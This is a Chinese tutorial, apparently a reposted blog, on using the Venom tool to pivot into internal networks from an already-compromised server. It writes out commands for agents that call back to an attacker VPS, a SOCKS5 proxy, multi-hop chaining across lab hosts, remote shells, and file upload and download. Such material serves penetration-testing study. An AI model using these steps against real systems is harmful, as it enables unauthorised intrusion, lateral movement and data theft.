前提:假设拿到某台服务器shell,可以上传文件且具有执行权限;

项目地址(编译后):https://github.com/Dliv3/Venom/releases
在这里插入图片描述

一、进入目标内网

1.上传admin_linux_x64到VPS上,运行并监听本地11111端口:

chmod 777 admin_linux_x64
./ admin_linux_x64 -lport 11111

在这里插入图片描述
2.利用已经拿到的的shell上传agent_linux_x64文件到目标服务器,并执行

chmod 777 agent_linux_x64
./agent_linux_x64 -rhost x.x.x.x -rport 11111
# x.x.x.x是指VPS 的IP

在这里插入图片描述

3.venom服务端有回显则表示连接成功,建立socks连接:

goto 1
socks 11112
# Start a socks5 server in port 11112

在这里插入图片描述
4.本地通过Proxifier软件连接VPS服务器开放的11112端口,就可以访问到目标内网
在这里插入图片描述
参考链接:https://xz.aliyun.com/t/4058

如果目标内网还需要存在多个网段,那么就需要进行多级代/理。以下内容为转载,原文链接:

https://blog.csdn.net/u011215939/article/details/103403545

二、穿透内网

Venom可连接节点,然后以节点为跳板,构建多级代//理。

实验环境:

1.服务器 IP:x.x.x.x

2.内网的机器三台windows IP地址:192.168.3.160、192.168.3.15、192.168.3.30

3.设想服务器要访问最里面的192.168.3.160只能一层一层的依次访问;192.168.3.160只能和192.168.3.30相互访问;192.168.3.30可以和192.168.3.15,192.168.3.160访问而不能访问服务器;最后3.15能被服务器访问,也能和3.30相互访问;利用Venom来进行一层一层的代理实现内网穿透;
在这里插入图片描述

实验开始

1.将下载好的Venom工具依次上传到对应的机器里面,服务器上面上传admin_linux_x64,并修改权限 chmod 777 admin_linux_x64
在这里插入图片描述
2、使用./admin_linux_x64文件来监听本地端口,内网的机器就是用agent.exe文件来连接服务器。服务器执行命令./admin_linux_x64 -lport 4343,监听本地4343端口
在这里插入图片描述
3、所有机器都已经上传了Venom工具包并解压,环境都是windows;在192.168.3.15机器上面执行连接操作;执行命令agent.exe -rhost 120.10.120.X -rport 4343
在这里插入图片描述
服务器监听成功,192.168.3.15被监听:
在这里插入图片描述
4、然后在服务器上进行操作;help查看命令。这里我们要使用到show,goto,listen,exit,shell这几个命令;

① 执行show命令,可以看见刚刚连接成功的一个节点;
在这里插入图片描述
② goto 1可以切换到1节点上面去
在这里插入图片描述
③shell 执行命令
在这里插入图片描述
④exit 退出,进行下一步的监听操作。在不退出1节点的基础上面执行listen 4343端口进行监听本地端口
在这里插入图片描述
5、在第二台内网主机192.168.3.30机器上面执行命令:

agent.exe -rhost 192.168.3.15 -rport 4343

在这里插入图片描述
6. 此时服务器成功跨越192.168.3.15连接到192.168.3.30。

①执行show命令发现新增了一个节点;
在这里插入图片描述
②切换到节点2中: goto 2 。执行命令:shell
在这里插入图片描述
7.现在进行最后一步实验:VPS服务器穿透192.168.3.15\192.168.3.30 连接到最内层192.168.3.160;依次执行命令exit,listen 4343 ;192.168.3.30机器开启本地监听:
在这里插入图片描述
①在192.168.3.160机器上面进行连接操作,执行命令:

agent.exe -rhost 192.168.3.30 -rport 4343

在这里插入图片描述
②服务器>show;成功建立监听
在这里插入图片描述
③goto 3 切换到3节点。shell 执行命令。至此内网穿透实验成功
在这里插入图片描述
其他:

1.以上监听的端口在节点上面进行listen的时候可以不一致,一台机器上也可以监听多个端口

2.本地文件上传于下载;
上传:

upload 2018.jpg C:\2018.jpg 
#将本地的文件上传到节点1的C盘根目录下面

在这里插入图片描述
下载

download C:\1.gif 1.gif 
# 将节点1中的文件下载到本地

在这里插入图片描述
3.Venom工具在执行过程中尽量不要将命令写错,写错后无法删除,只能重头来过。

=========================================================
在这里插入图片描述

Logo
开放原子开发者工作坊

开放原子开发者工作坊旨在鼓励更多人参与开源活动,与志同道合的开发者们相互交流开发经验、分享开发心得、获取前沿技术趋势。工作坊有多种形式的开发者活动,如meetup、训练营等,主打技术交流,干货满满,真诚地邀请各位开发者共同参与!

更多推荐

多模态大模型&科学计算双管齐下,百度飞桨两大赛项报名倒计时!

第二届开放原子大赛是由开放原子开源基金会组织举办的开源技术领域专业赛事,聚焦解决真问题,重点覆盖基础软件、工业软件、人工智能大模型等领域

avatar 开放原子开发者工作坊

以智能 致世界 | 操作系统大会2024议程全览

avatar 开放原子开发者工作坊

开放原子开源基金会新增捐赠人(2024年9月)

2024年9月,新增以下单位成为开放原子开源基金会及旗下项目捐赠人。

avatar 开放原子开发者工作坊